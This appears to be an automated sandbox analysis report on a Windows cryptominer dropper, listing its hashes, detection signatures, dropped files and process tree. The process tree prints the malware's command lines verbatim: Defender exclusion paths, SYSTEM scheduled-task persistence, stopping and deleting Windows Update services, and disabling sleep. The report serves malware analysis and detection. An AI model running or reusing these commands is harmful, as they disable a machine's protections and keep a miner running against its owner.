Analysis
-
max time kernel
189s -
max time network
208s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
11-02-2023 08:58
Static task
static1
Behavioral task
behavioral1
Sample
2850ccb10aa6f6700d555ca67f89f1e0.exe
Resource
win7-20221111-en
General
-
Target
2850ccb10aa6f6700d555ca67f89f1e0.exe
-
Size
7.4MB
-
MD5
2850ccb10aa6f6700d555ca67f89f1e0
-
SHA1
c55b593e654f822ed59d86bab7f8e081b331f132
-
SHA256
4589f71870479cdddc1439394eb7c27da1c95d1f7a89016168f32f6791f541ab
-
SHA512
8ee232798200eb6b25116ef75c3a07f61812ee3865b95272e92010ccc021d3fb261982a309c69a592cab5e397de945733133bb2cfd77faaa0be9acf3038df0c9
-
SSDEEP
196608:ak5uXAsEDJBbnU3ec/fEF9KtlsWQpAJyy8:ak5uQZfLU3P3Y9qlrJy
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2172 2064 rundll32.exe 78 -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 2368 created 3020 2368 XandETC.exe 62 PID 2368 created 3020 2368 XandETC.exe 62 PID 2368 created 3020 2368 XandETC.exe 62 PID 2368 created 3020 2368 XandETC.exe 62 PID 2368 created 3020 2368 XandETC.exe 62 PID 948 created 3020 948 updater.exe 62 PID 948 created 3020 948 updater.exe 62 PID 948 created 3020 948 updater.exe 62 PID 948 created 3020 948 updater.exe 62 PID 948 created 3020 948 updater.exe 62 PID 948 created 3020 948 updater.exe 62 PID 948 created 3020 948 updater.exe 62 -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/memory/3692-213-0x00007FF61BE60000-0x00007FF61C654000-memory.dmp xmrig behavioral2/memory/3692-215-0x00007FF61BE60000-0x00007FF61C654000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation 2850ccb10aa6f6700d555ca67f89f1e0.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation liuj.exe -
Executes dropped EXE 5 IoCs
pid Process 1628 llpb1133.exe 1484 liuj.exe 2368 XandETC.exe 4292 liuj.exe 948 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 4168 rundll32.exe -
resource yara_rule behavioral2/memory/3692-213-0x00007FF61BE60000-0x00007FF61C654000-memory.dmp upx behavioral2/memory/3692-215-0x00007FF61BE60000-0x00007FF61C654000-memory.dmp upx -
resource yara_rule behavioral2/files/0x0008000000022e10-134.dat vmprotect behavioral2/files/0x0008000000022e10-135.dat vmprotect behavioral2/memory/1628-141-0x0000000140000000-0x0000000140620000-memory.dmp vmprotect -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 948 set thread context of 3952 948 updater.exe 139 PID 948 set thread context of 3692 948 updater.exe 145 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2324 sc.exe 2348 sc.exe 1772 sc.exe 4608 sc.exe 3604 sc.exe 4816 sc.exe 2300 sc.exe 428 sc.exe 3544 sc.exe 5100 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3684 4168 WerFault.exe 87 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2368 XandETC.exe 2368 XandETC.exe 2072 powershell.exe 2072 powershell.exe 2368 XandETC.exe 2368 XandETC.exe 2368 XandETC.exe 2368 XandETC.exe 2368 XandETC.exe 2368 XandETC.exe 3908 powershell.exe 3908 powershell.exe 2368 XandETC.exe 2368 XandETC.exe 4788 powershell.exe 4788 powershell.exe 948 updater.exe 948 updater.exe 2180 powershell.exe 2180 powershell.exe 948 updater.exe 948 updater.exe 948 updater.exe 948 updater.exe 948 updater.exe 948 updater.exe 4420 powershell.exe 4420 powershell.exe 948 updater.exe 948 updater.exe 948 updater.exe 948 updater.exe 3952 conhost.exe 3952 conhost.exe 948 updater.exe 948 updater.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe 3692 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2072 powershell.exe Token: SeShutdownPrivilege 2200 powercfg.exe Token: SeCreatePagefilePrivilege 2200 powercfg.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeShutdownPrivilege 2292 powercfg.exe Token: SeCreatePagefilePrivilege 2292 powercfg.exe Token: SeShutdownPrivilege 4044 powercfg.exe Token: SeCreatePagefilePrivilege 4044 powercfg.exe Token: SeShutdownPrivilege 3292 powercfg.exe Token: SeCreatePagefilePrivilege 3292 powercfg.exe Token: SeIncreaseQuotaPrivilege 3908 powershell.exe Token: SeSecurityPrivilege 3908 powershell.exe Token: SeTakeOwnershipPrivilege 3908 powershell.exe Token: SeLoadDriverPrivilege 3908 powershell.exe Token: SeSystemProfilePrivilege 3908 powershell.exe Token: SeSystemtimePrivilege 3908 powershell.exe Token: SeProfSingleProcessPrivilege 3908 powershell.exe Token: SeIncBasePriorityPrivilege 3908 powershell.exe Token: SeCreatePagefilePrivilege 3908 powershell.exe Token: SeBackupPrivilege 3908 powershell.exe Token: SeRestorePrivilege 3908 powershell.exe Token: SeShutdownPrivilege 3908 powershell.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeSystemEnvironmentPrivilege 3908 powershell.exe Token: SeRemoteShutdownPrivilege 3908 powershell.exe Token: SeUndockPrivilege 3908 powershell.exe Token: SeManageVolumePrivilege 3908 powershell.exe Token: 33 3908 powershell.exe Token: 34 3908 powershell.exe Token: 35 3908 powershell.exe Token: 36 3908 powershell.exe Token: SeIncreaseQuotaPrivilege 3908 powershell.exe Token: SeSecurityPrivilege 3908 powershell.exe Token: SeTakeOwnershipPrivilege 3908 powershell.exe Token: SeLoadDriverPrivilege 3908 powershell.exe Token: SeSystemProfilePrivilege 3908 powershell.exe Token: SeSystemtimePrivilege 3908 powershell.exe Token: SeProfSingleProcessPrivilege 3908 powershell.exe Token: SeIncBasePriorityPrivilege 3908 powershell.exe Token: SeCreatePagefilePrivilege 3908 powershell.exe Token: SeBackupPrivilege 3908 powershell.exe Token: SeRestorePrivilege 3908 powershell.exe Token: SeShutdownPrivilege 3908 powershell.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeSystemEnvironmentPrivilege 3908 powershell.exe Token: SeRemoteShutdownPrivilege 3908 powershell.exe Token: SeUndockPrivilege 3908 powershell.exe Token: SeManageVolumePrivilege 3908 powershell.exe Token: 33 3908 powershell.exe Token: 34 3908 powershell.exe Token: 35 3908 powershell.exe Token: 36 3908 powershell.exe Token: SeIncreaseQuotaPrivilege 3908 powershell.exe Token: SeSecurityPrivilege 3908 powershell.exe Token: SeTakeOwnershipPrivilege 3908 powershell.exe Token: SeLoadDriverPrivilege 3908 powershell.exe Token: SeSystemProfilePrivilege 3908 powershell.exe Token: SeSystemtimePrivilege 3908 powershell.exe Token: SeProfSingleProcessPrivilege 3908 powershell.exe Token: SeIncBasePriorityPrivilege 3908 powershell.exe Token: SeCreatePagefilePrivilege 3908 powershell.exe Token: SeBackupPrivilege 3908 powershell.exe Token: SeRestorePrivilege 3908 powershell.exe Token: SeShutdownPrivilege 3908 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 1628 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 80 PID 1644 wrote to memory of 1628 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 80 PID 1644 wrote to memory of 1484 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 81 PID 1644 wrote to memory of 1484 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 81 PID 1644 wrote to memory of 1484 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 81 PID 1644 wrote to memory of 2368 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 83 PID 1644 wrote to memory of 2368 1644 2850ccb10aa6f6700d555ca67f89f1e0.exe 83 PID 1484 wrote to memory of 4292 1484 liuj.exe 84 PID 1484 wrote to memory of 4292 1484 liuj.exe 84 PID 1484 wrote to memory of 4292 1484 liuj.exe 84 PID 2172 wrote to memory of 4168 2172 rundll32.exe 87 PID 2172 wrote to memory of 4168 2172 rundll32.exe 87 PID 2172 wrote to memory of 4168 2172 rundll32.exe 87 PID 1324 wrote to memory of 2200 1324 cmd.exe 100 PID 1324 wrote to memory of 2200 1324 cmd.exe 100 PID 2436 wrote to memory of 4816 2436 cmd.exe 99 PID 2436 wrote to memory of 4816 2436 cmd.exe 99 PID 1324 wrote to memory of 2292 1324 cmd.exe 101 PID 1324 wrote to memory of 2292 1324 cmd.exe 101 PID 2436 wrote to memory of 2324 2436 cmd.exe 102 PID 2436 wrote to memory of 2324 2436 cmd.exe 102 PID 1324 wrote to memory of 4044 1324 cmd.exe 103 PID 1324 wrote to memory of 4044 1324 cmd.exe 103 PID 1324 wrote to memory of 3292 1324 cmd.exe 104 PID 1324 wrote to memory of 3292 1324 cmd.exe 104 PID 2436 wrote to memory of 2348 2436 cmd.exe 105 PID 2436 wrote to memory of 2348 2436 cmd.exe 105 PID 2436 wrote to memory of 1772 2436 cmd.exe 106 PID 2436 wrote to memory of 1772 2436 cmd.exe 106 PID 2436 wrote to memory of 4608 2436 cmd.exe 107 PID 2436 wrote to memory of 4608 2436 cmd.exe 107 PID 2436 wrote to memory of 1520 2436 cmd.exe 108 PID 2436 wrote to memory of 1520 2436 cmd.exe 108 PID 2436 wrote to memory of 2040 2436 cmd.exe 109 PID 2436 wrote to memory of 2040 2436 cmd.exe 109 PID 2436 wrote to memory of 3032 2436 cmd.exe 110 PID 2436 wrote to memory of 3032 2436 cmd.exe 110 PID 2436 wrote to memory of 4552 2436 cmd.exe 111 PID 2436 wrote to memory of 4552 2436 cmd.exe 111 PID 2436 wrote to memory of 2316 2436 cmd.exe 112 PID 2436 wrote to memory of 2316 2436 cmd.exe 112 PID 4788 wrote to memory of 808 4788 powershell.exe 115 PID 4788 wrote to memory of 808 4788 powershell.exe 115 PID 3080 wrote to memory of 2300 3080 cmd.exe 123 PID 3080 wrote to memory of 2300 3080 cmd.exe 123 PID 3428 wrote to memory of 4756 3428 cmd.exe 124 PID 3428 wrote to memory of 4756 3428 cmd.exe 124 PID 3428 wrote to memory of 4196 3428 cmd.exe 126 PID 3428 wrote to memory of 4196 3428 cmd.exe 126 PID 3080 wrote to memory of 428 3080 cmd.exe 127 PID 3080 wrote to memory of 428 3080 cmd.exe 127 PID 3080 wrote to memory of 3544 3080 cmd.exe 129 PID 3080 wrote to memory of 3544 3080 cmd.exe 129 PID 3428 wrote to memory of 3904 3428 cmd.exe 130 PID 3428 wrote to memory of 3904 3428 cmd.exe 130 PID 3080 wrote to memory of 5100 3080 cmd.exe 131 PID 3080 wrote to memory of 5100 3080 cmd.exe 131 PID 3428 wrote to memory of 1664 3428 cmd.exe 132 PID 3428 wrote to memory of 1664 3428 cmd.exe 132 PID 3080 wrote to memory of 3604 3080 cmd.exe 133 PID 3080 wrote to memory of 3604 3080 cmd.exe 133 PID 3080 wrote to memory of 1816 3080 cmd.exe 134 PID 3080 wrote to memory of 1816 3080 cmd.exe 134 PID 3080 wrote to memory of 4452 3080 cmd.exe 135
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3020
-
C:\Users\Admin\AppData\Local\Temp\2850ccb10aa6f6700d555ca67f89f1e0.exe"C:\Users\Admin\AppData\Local\Temp\2850ccb10aa6f6700d555ca67f89f1e0.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe"C:\Users\Admin\AppData\Local\Temp\llpb1133.exe"3⤵
- Executes dropped EXE
PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\liuj.exe"C:\Users\Admin\AppData\Local\Temp\liuj.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\liuj.exe"C:\Users\Admin\AppData\Local\Temp\liuj.exe" -h4⤵
- Executes dropped EXE
PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2368
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4044
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4816
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1772
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1520
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2040
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3032
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4552
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2316
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:808
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2300
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:428
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3544
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5100
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3604
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1816
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4452
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3748
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:3704
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4848
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4756
-
-
